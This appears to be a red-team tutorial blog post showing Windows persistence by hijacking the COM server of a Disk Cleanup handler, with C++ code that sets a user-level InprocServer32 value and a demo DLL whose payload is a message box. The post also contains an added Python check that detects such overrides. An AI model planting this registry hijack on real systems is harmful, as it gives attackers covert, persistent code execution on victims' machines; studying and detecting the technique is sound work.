# Malware development: persistence - part 19. Disk Cleanup Utility. Simple C++ example.

November 16, 2022, 2 minute read, https://cocomelonc.github.io/persistence/2022/11/16/malware-pers-19.html

﷽

Hello, cybersecurity enthusiasts and white hackers!

This post is based on my own research into one of the more interesting malware persistence tricks: via the Disk Cleanup Utility.

### disk cleanup

If you have ever had an issue with limited hard disk space, you are certainly familiar with the Disk Cleanup utility.

Good news for red teamers: the "Files to delete" list displayed in the user interface is not random. Just run the command:

```bash
reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches" /s
```

[screenshot: Disk Cleanup for Windows 10 (C:) next to the `reg query` output for the VolumeCaches subkeys]

As you can see, there are even default values of the registry keys here.
Also, if we have `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\<handler>\(Default) = <CLSID>`, we can find another registry key value: `HKCR\CLSID\<CLSID>\InProcServer32 = <DLL path>`:

[screenshot: the handler CLSID under HKEY_CLASSES_ROOT with its InProcServer32 value]

For demo purposes, here I show the example from HKEY_CLASSES_ROOT, because the corresponding HKEY_CURRENT_USER key is empty.

This suggests that we can use COM DLL hijacking for persistence. Let's try.

### practical example

First of all, as usual, create an "evil" DLL (`hack.cpp`), the same as in the COM hijacking post: https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html

```cpp
/*
hack.cpp
simple DLL
author: @cocomelonc
https://cocomelonc.github.io/persistence/2022/11/16/malware-pers-19.html
*/
#include <windows.h>
#pragma comment (lib, "user32.lib")

BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) {
  switch (nReason) {
  case DLL_PROCESS_ATTACH:
    // show a message box when the DLL is loaded into a process
    MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK);
    break;
  case DLL_PROCESS_DETACH:
    break;
  case DLL_THREAD_ATTACH:
    break;
  case DLL_THREAD_DETACH:
    break;
  }
  return TRUE;
}
```

As usual, for simplicity, it's just a meow-meow message box. And then create the persistence script (`pers.cpp`):

```cpp
/*
pers.cpp
windows persistence via Disk Cleaner
author: @cocomelonc
https://cocomelonc.github.io/persistence/2022/11/16/malware-pers-19.html
*/
#include <windows.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[]) {
  HKEY hkey = NULL;

  // subkey: per-user InprocServer32 for the Disk Cleanup handler CLSID
  const char* sk = "Software\\Classes\\CLSID\\{8369AB20-56C9-11D0-94E8-00AA0059CE02}\\InprocServer32";

  // malicious DLL
  const char* dll = "Z:\\2022-11-16-malware-pers-19\\hack.dll";

  // startup
  LONG res = RegCreateKeyEx(HKEY_CURRENT_USER, (LPCSTR)sk, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE | KEY_QUERY_VALUE, NULL, &hkey, NULL);
  if (res == ERROR_SUCCESS) {
    // set the (Default) value; the REG_SZ size includes the terminating null
    RegSetValueEx(hkey, NULL, 0, REG_SZ, (unsigned char*)dll, strlen(dll) + 1);
    RegCloseKey(hkey);
  } else {
    printf("cannot create subkey value :(\n");
    return -1;
  }
  return 0;
}
```

As the CLSID I took `8369AB20-56C9-11D0-94E8-00AA0059CE02`. As you can see, the code is similar to the COM hijacking post.
The difference is only in the values of the variables.

### demo

Let's compile our evil DLL:

```bash
x86_64-w64-mingw32-gcc -shared -o hack.dll hack.cpp
```

(see https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html)

And the persistence script:

```bash
x86_64-w64-mingw32-g++ -O2 pers.cpp -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive
```

Copy to the victim's machine. In my case, Windows 10 x64. Run:

```bash
reg query "HKCU\Software\Classes\CLSID\{8369AB20-56C9-11D0-94E8-00AA0059CE02}" /s
.\pers.exe
```

[screenshot: `reg query` on the victim machine shows the new HKEY_CURRENT_USER (Default) value, and the "Meow-meow!" message box appears after running Disk Cleanup]

As you can see, everything worked perfectly! =^..^=

But this persistence requires the user to run the Disk Cleanup Utility. Here I can use one of the classic tricks for persistence. Adding Disk Cleanup to run during start-up may not be the best idea, because it has a GUI. I tried using the command line arguments of this program:

```bash
cleanmgr.exe
cleanmgr.exe /cleanup
cleanmgr.exe /autoclean
cleanmgr.exe /setup
```

But failed :(. It worked correctly: https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html

I think I will return to this issue in one of the future posts.

Also, according to the Microsoft documentation, we can add new entries to: `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches`

I don't know if any APT in the wild has used this tactic and trick, but I hope this post spreads awareness to blue teamers of this interesting technique, especially when creating software, and adds a weapon to the red teamers' arsenal. This is a practical case for educational purposes only.
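A defender-side check, added here as an example and not part of the original post: it parses the output of the two `reg query` commands used above (constructed sample output, with the CLSID and DLL path from this post; the handler names are made up) and flags any Disk Cleanup handler whose InprocServer32 is redefined under HKCU\Software\Classes, the user-writable hive that HKCR merges ahead of the HKLM registration.

```python
import re

# Constructed sample of `reg query "HKLM\...\VolumeCaches" /s` output (not real machine data).
# The first handler uses the CLSID from this post, the second is a made-up placeholder.
VOLUMECACHES_SAMPLE = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Example Handler
    (Default)    REG_SZ    {8369AB20-56C9-11D0-94E8-00AA0059CE02}

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Other Handler
    (Default)    REG_SZ    {11111111-2222-3333-4444-555555555555}
"""

# Constructed sample of `reg query HKCU\Software\Classes\CLSID /s` output after pers.exe ran.
HKCU_CLSID_SAMPLE = r"""
HKEY_CURRENT_USER\Software\Classes\CLSID\{8369AB20-56C9-11D0-94E8-00AA0059CE02}\InprocServer32
    (Default)    REG_SZ    Z:\2022-11-16-malware-pers-19\hack.dll
"""

KEY_RE = re.compile(r"^HKEY_[A-Z_]+\\(.*)$")
DEFAULT_RE = re.compile(r"^\s+\(Default\)\s+REG_(?:EXPAND_)?SZ\s+(.*?)\s*$")

def parse_defaults(reg_output):
    """Map each key path (hive prefix stripped, lower-cased) to its (Default) value."""
    defaults, current = {}, None
    for line in reg_output.splitlines():
        m = KEY_RE.match(line)
        if m:
            current = m.group(1).lower()
            continue
        m = DEFAULT_RE.match(line)
        if m and current:
            defaults[current] = m.group(1)
    return defaults

def handler_clsids(volumecaches_output):
    """CLSIDs registered as Disk Cleanup handlers under VolumeCaches."""
    return {v.upper() for k, v in parse_defaults(volumecaches_output).items()
            if "\\volumecaches\\" in k}

def find_user_overrides(volumecaches_output, hkcu_clsid_output):
    """Return {CLSID: DLL path} for handlers whose InprocServer32 is redefined in
    HKCU\\Software\\Classes, which HKCR merges ahead of the HKLM registration."""
    clsids = handler_clsids(volumecaches_output)
    hits = {}
    for key, value in parse_defaults(hkcu_clsid_output).items():
        m = re.search(r"\\clsid\\(\{[0-9a-f-]+\})\\inprocserver32$", key)
        if m and m.group(1).upper() in clsids:
            hits[m.group(1).upper()] = value
    return hits
```

On a clean machine the HKCU query returns nothing for these CLSIDs, so any hit is worth triage; a hit whose DLL path lies outside the Windows directories is the pattern this post demonstrates.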
- MSDN: Registering a Disk Cleanup Handler: https://learn.microsoft.com/en-us/windows/win32/lwef/disk-cleanup?redirectedfrom=MSDN#registration
- DLL hijacking: https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html
- DLL hijacking with exported functions: https://cocomelonc.github.io/pentest/2021/10/12/dll-hijacking-2.html
- Malware persistence: part 1: https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html
- Malware persistence: part 3: https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html
- Source code in GitHub: https://github.com/cocomelonc/2022-11-16-malware-pers-19

Thanks for your time, happy hacking and good bye!
PS. All drawings and screenshots are mine